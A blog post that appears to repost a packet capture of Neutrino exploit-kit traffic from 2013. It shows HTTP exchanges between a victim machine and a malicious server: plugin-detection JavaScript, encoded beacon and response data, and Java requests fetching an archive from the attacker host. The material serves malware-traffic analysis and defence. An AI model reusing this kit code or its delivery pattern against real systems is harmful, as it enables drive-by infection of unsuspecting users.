this.get(a[this.any],b):null},get:function(a,b){var c=a.length-1,d=this.$.isNum(b)?b:c;return 0>d||d>c?null:a[d]},split:function(a,b){var c=this.$,d=null,e;a=a?a.replace(“.”,”\\.”):””;e=RegExp(“^(.*[^\\/])(“+a+”\\s*)$”);c.isString(b)&&e.test(b)&&(c=RegExp.$1.split(“/”),d={name:c[c.length-1],ext:RegExp.$2,full:b},c[c.length-1]=””,d.path=c.join(“/”));return d},z:0},Plugins:{quicktime:{mimeType:[“video/quicktime”,”application/x-quicktimeplayer”,”image/x-macpaint”,”image/x-quicktime”],progID:”QuickTimeCh
2013-06-18 19:25:25.969905 IP 199.195.249.188.8000 > 192.168.122.178.49362: Flags [P.], seq 759:985, ack 1396, win 142, length 226
E..
[email protected]……[email protected]#.n7}X.P….P..HTTP/1.1 200 OK

Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

c
// iisukhquz
0
2013-06-18 19:25:26.002400 IP 199.195.249.188.8000 > 192.168.122.178.49360: Flags [P.], seq 566:975, ack 1391, win 142, length 409
E…[email protected]………z..@…..x.x.uP….w..HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

d0
ybrjnscxwngmgzzgorzzrghbwqujnkellvvzoywlldyrdyyspxrgeziapcjcmnoyjkxyiujuyhmcfkuvimcmlknanxdalsyvcwtlrdfpkrsqcmmkyoxkzkkmhomtglojhhuykaovsgmutyfsnccmmmzualohxcqekldvlsqeydzrcejpgmctyboznchkfxopiskukbzieyagckwi
0
2013-06-18 19:25:26.004491 IP 199.195.249.188.8000 > 192.168.122.178.49364: Flags [P.], seq 22422:23802, ack 939, win 125, length 1380
E…’[email protected]. …….z..@..)..
fs..P..}.2..?1:c?-0.2:-1);2==this.OTF&&(this.NOTF&&!this.applet.getResult()[0]&&!this.lang.System.getProperty()[0])&&(this.installed=c?-0.2:-1);c&&(this.version0=e.formatNum(e.getNum(c)));a&&!g&&(this.version=e.formatNum(e.getNum(a)));b&&e.isString(b)&&(this.vendor=b);this.vendor||(this.vendor=””);this.verify&&
this.verify.isEnabled()?this.getVersionDone=0:1!=this.getVersionDone&&(this.getVersionDone=2>this.OTF?0:this.applet.can_Insert_Query_Any()?0:1);e.codebase.emptyGarbage()},DTK:{$:1,hasRun:0,status:null,VERSIONS:[],version:””,HTML:null,Plugin2Status:null,classID:[“clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA”,”clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA”],mimeType:[“application/java-deployment-toolkit”,”application/npruntime-scriptable-plugin;DeploymentToolkit”],isDisabled:function(){var a=this.$;return a.isIE&&
(6>a.verIE||!a.ActiveXEnabled)||a.isGecko&&0>=a.compareNums(a.verGecko,a.formatNum(“1.6″))||a.isSafari&&1==a.OS&&(!a.verSafari||0>a.compareNums(a.verSafari,”5,1,0,0”))||a.isChrome?1:0},query:function(){var a=this.$,b=this.$$,c,d,e=a.DOM.altHTML,f={},g,h=null,j=null,k=this.hasRun||this.isDisabled();this.hasRun=1;if(k)return this;this.status=0;if(a.isIE)for(c=0;c<this.classID.length&&!(this.HTML=a.DOM.insert(“object”,[“classid”,this.classID[c]],[],e),h=this.HTML.obj(),a.getPROP(h,”jvms”));c++);else if((d=
a.hasMimeType(this.mimeType))&&d.type)this.HTML=a.DOM.ins
2013-06-18 19:25:26.010786 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 2770:3080, ack 1490, win 144, length 310
E..^[email protected]………z..@…..*.H..P…….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

5f
// ztyxzszfvurhbvplkmslduqnoyxbjaljujgtbgywaqecltnwgfhjaywowuqgvbppkwjldiidyngkgtgnzowzmtojoepk
0
2013-06-18 19:25:26.013870 IP 199.195.249.188.8000 > 192.168.122.178.49361: Flags [P.], seq 327:629, ack 936, win 125, length 302
[email protected]………z..@…….e..P..}K…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

65
ibcmpqzomkssmhtgfmogteynnvqxwjhflkraaqpnbhfnpzuumjbfnzsavjxrtfweqnfqeudfcjtrinluwnakmtkidizxowcekhuoc
0

2013-06-18 19:25:26.063833 IP 192.168.122.178.49359 > 199.195.249.188.8000: Flags [P.], seq 1490:1955, ack 3080, win 16423, length 465
E…X.@…….z……[email protected]…..`P.@’[email protected] /mgylmdxkq.png HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.063996 IP 192.168.122.178.49361 > 199.195.249.188.8000: Flags [P.], seq 936:1399, ack 629, win 16403, length 463
E…X.@…….z……[email protected]……P.@..*..GET /szqbqjq.png HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.064147 IP 192.168.122.178.49363 > 199.195.249.188.8000: Flags [P.], seq 1393:1853, ack 811, win 16357, length 460
E…X.@…….z……..@…._.d.P.?…..GET /txvu.jpg HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.064280 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 1396:1857, ack 985, win 16314, length 461
E…X.@…….z……..@7}X.p#.PP.?..t..GET /plrjx.gif HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.064429 IP 192.168.122.178.49360 > 199.195.249.188.8000: Flags [P.], seq 1391:1861, ack 975, win 16316, length 470
E…X.@…….z……[email protected]….P.?…..GET /obzmmphsihjjxs.gif HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.064569 IP 192.168.122.178.49364 > 199.195.249.188.8000: Flags [P.], seq 939:1410, ack 42230, win 16560, length 471
E…X.@…….z……..@fs..)..jP.@..[..GET /tutoogrerinpmdl.gif HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive

 

2013-06-18 19:25:26.290517 IP 199.195.249.188.8000 > 192.168.122.178.49363: Flags [P.], seq 811:1255, ack 1853, win 159, length 444
E…[email protected]………z..@.._.d….}P…>…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

f1
wbomnjerpmtljpizcebuawvdhnyvtctpdibrrgjhtcscrbctfdofakjhyidrkwgoeigwopehsxkjymdeqrkqctxabarlxyacggzvwddoanyyzccpunfwgdwheotbmuesbdoxgrmhfkfeniuhwaeceajipdkbxouyriwyaifftlkgufoqgssktctigdkdrecjnyiohntbzeitjwkppcajftslxcpphsyuqhiyuczughnqeyftb
0
2013-06-18 19:25:26.292608 IP 192.168.122.178.49363 > 199.195.249.188.8000: Flags [P.], seq 1853:2315, ack 1255, win 16246, length 462
E…X.@…….z……..@…}_.f|P.?v….GET /koqavj.gif HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.294641 IP 199.195.249.188.8000 > 192.168.122.178.49362: Flags [P.], seq 985:1445, ack 1857, win 159, length 460
E…[email protected]……[email protected]#.P7}ZTP…….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

101
svoiignjsebvwhzduimxrmgsshrhifhaavjjcxsvburybqbvyotqazjthabpfiqgeaphxiczctxdjzzinszosihzjioprfwwfmdcugcxzzbjyasltsalbhlkqaaifweljindoqbopcxocqaviahjhtuytugzrlkatyeiofwehusklsgttndbhxzasfakqklkiqswvpadktnvmupfisgpqgqimqtcaenjugfqvgugahbmcrrkjyzzepiqgbtgfgpan
0
2013-06-18 19:25:26.301355 IP 199.195.249.188.8000 > 192.168.122.178.49360: Flags [P.], seq 975:1417, ack 1861, win 159, length 442
E…[email protected]………z..@…….x.KP…….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

f0
gttgvxysyaxooujjsvahiiippapjsthymbeizcaxdymstvclqctzlcpacejuxrtktxssztqdrcvkyxwpapplreluivpgniqgfjyfdojurefpcbfcruoiyzdhvsnibeohonnrcwmtbrjdtpfljttitxqpqexrimzxamociawksgnmvtxfnqogoevejtwrgvpgidirefbwloihhfnuwcblhxqqqmiwixdqbmifrjcdylkgrybo
0

2013-06-18 19:25:26.306551 IP 199.195.249.188.8000 > 192.168.122.178.49361: Flags [P.], seq 629:896, ack 1399, win 142, length 267
[email protected]………z..@…….e..P…….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

41
xrbhjvqnyqvmiohhmriqpqgfgjjwozcmqeuaakozbkljytqkkzbzqiewrotgowsfa
0
2013-06-18 19:25:26.306881 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 3080:3465, ack 1955, win 161, length 385
E…[email protected]………z..@…..`.H.rP…….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

b7
uodmzatqwhyqucgygwbdmxlppewzwlrrzudzvxpseojzrpxxmzbzxmomrlmnwdfwyivtflmkzvkrlioxiqwfdlsuxeitinqgvmabynmyiwpufdsnuotxamrxqzrzmigiugktuwrctgxykpleefbfrscisuhfcnnxuyqovirooonydzcieenvxpd
0
2013-06-18 19:25:26.324512 IP 199.195.249.188.8000 > 192.168.122.178.49364: Flags [P.], seq 42230:42685, ack 1410, win 142, length 455
E…’[email protected].$I……z..@..)..jfs.}P…i…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

fd
dziwvgwgfwfkraifcmavhqlmkrxuujuxjcufjqlpmraerijuvkpdbbplsngnxakgdflmvxbiocmgkwaggqjirztkmzxjziqdnbpjzrrotdvezwkgmuoetipghnqhvgkjhashrjvlnqpmmaszvhepptvxglecrplzqegiobtbsjnfkgefoiudcpajbfltvxslbztpbnrtwfygldmamgdpwdyxjkqehipjijzjwqctvbahfmhrtkgpoemxpdcwl
0
2013-06-18 19:25:26.552165 IP 199.195.249.188.8000 > 192.168.122.178.49363: Flags [P.], seq 1255:1542, ack 2315, win 175, length 287
[email protected]………z..@.._.f|…KP….Q..HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

55
rhqphmstalzmuzzcfynipwkfgymhlepdmgstskntwmfrletrdhasdlyjjkrupgybnqufbiyxvephjiympzftk
0

2013-06-18 19:25:26.728803 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 1857:2471, ack 1445, win 16560, length 614
E…X.@….u..z……..@7}ZTp#[email protected] /boezkexoxrlbjwxii HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Content-Length: 750
Connection: Keep-Alive
Cache-Control: no-cache
2013-06-18 19:25:26.728942 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 2471:3221, ack 1445, win 16560, length 750
E…X.@…….z……..@7}\.p#..P.@…..rjdnwzbergbxgkxv=oirewfai&ewgstvpkgrud=%2514K%2502%2509%2502%2501%2508%2507%251CKH%251EU%2507%2505%2506%250D%250C-%2517%2512%2507%2505%250C%251DKHGFVMYCY%255EUUJC%2503%250E%251F%2513GMDPEYEBIESCEM%250F%251E%2504%2504%250ECS%2501%251C%251E%2509%255BD%2510%251C%2506%250A%2519%253A%2503%250F%250C%250CMS%251C%2510%251B%250AMK%251D%250C%2513%2509(%2516%250D%2508%2516%250C%2500GM%2508%2514%2505%2503EP%2516%251F%2509%2502%2502%2518%2508%2504%2500U%255C%250F%251C%2503%2505%255EG%2504%250F%250D%251F%250A%251B-%2509%251E%2501%2509%251DMS%251C%2510%251B%250AMK%2519%2505%2511GM%2508%2514%2505%2503EP%2512%251A%2516CS%2501%251C%251E%2509%250AJC%2501%2506%250DP_USP%250A_%250F%2513RB%2507%2500%2508%255D%250A%2511%2504AT%2502X%255B%255D%2513%2503%2514D%251C
2013-06-18 19:25:26.998061 IP 199.195.249.188.8000 > 192.168.122.178.49362: Flags [P.], seq 1445:2427, ack 3221, win 201, length 982
E…[email protected].._……[email protected]#..7}_.P…a…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

2fc
S%08%02%15%1B%03%15I%0E%1B%11%0D%1E%10%04TH%01%06%11%07%5CNF%5E%5BB%5D%15%5ER%0BWX%11TCW%04%0A%0B_%14UB%03S%5DA%1E%17%07%1F%09%11G%00%1B%15_OVQY%40%0A%10%16%03%0E%02%0F%1EV%1F%0C%1A%15%13%1E%1CT%1C%16%1F%04%05%08%06%18%1C%04%0EAA%0A%00%0D%17XP%27%13%1DHI%05%0C%13%12%09THXBBW%0E%04%00%08%01%06XPWQNQc%7Bl~ohU%1F%08%00%04%1AF%0F%08%02%0COB%12%1E%04%0AHI%04%04%1B%13%04TH%08%3A7G%05%25%06%19%25%08%20%0E%2B%25%01%06%266%2B%1E%29%25%2F%05%24%264%0F%3C6%27%04%27%1F%3C%00%286%3C%16%271PD%3C6%23%00%0BA%24%02%04R%23%01%26%18%02%00%2B%25%28%193%3A%2F%1C%3C%26%23%019%40T%1B%3F%0C%01%17%0D%3A%01B%3FS%0D%019%25P%0D%07%26%23%040%25%09%0F%04%0C%2FZNLo~oh%60fU%02%04%05%07%0CI%01%08%1F%00JA%19%02%0A%10UE%01%07%0D%1C%0ATU%0B%0E%0A%09%1F%18NLo~oh%60SF%13%15%07%0A%04%1DQc%7Bl
0
2013-06-18 19:25:30.201138 IP 192.168.122.178.49367 > 199.195.249.188.8000: Flags [P.], seq 1442891400:1442891714, ack 1479034204, win 258, length 314
E..bX$@…….z……..@V…X(E\P…L$..GET /cbsthcfq?mimsrws=nshbdaiqnay HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2013-06-18 19:25:30.861555 IP 192.168.122.178.49368 > 199.195.249.188.8000: Flags [P.], seq 4010440799:4010441036, ack 1088642486, win 258, length 237
E…X4@…….z……..@.
x_@.].P….4..GET /drddbg?mebhqtwycgg=nshbdaiqnay HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

 



This post first appeared on Computer Security.org - CyberSecurity News, Inform, please read the originial post: here

Share the post

Neutrino Web Based Exploit Kit Traffic Sample full PCAP Download

×

Subscribe to Computer Security.org - Cybersecurity News, Inform

Get updates delivered right to your inbox!

Thank you for your subscription

×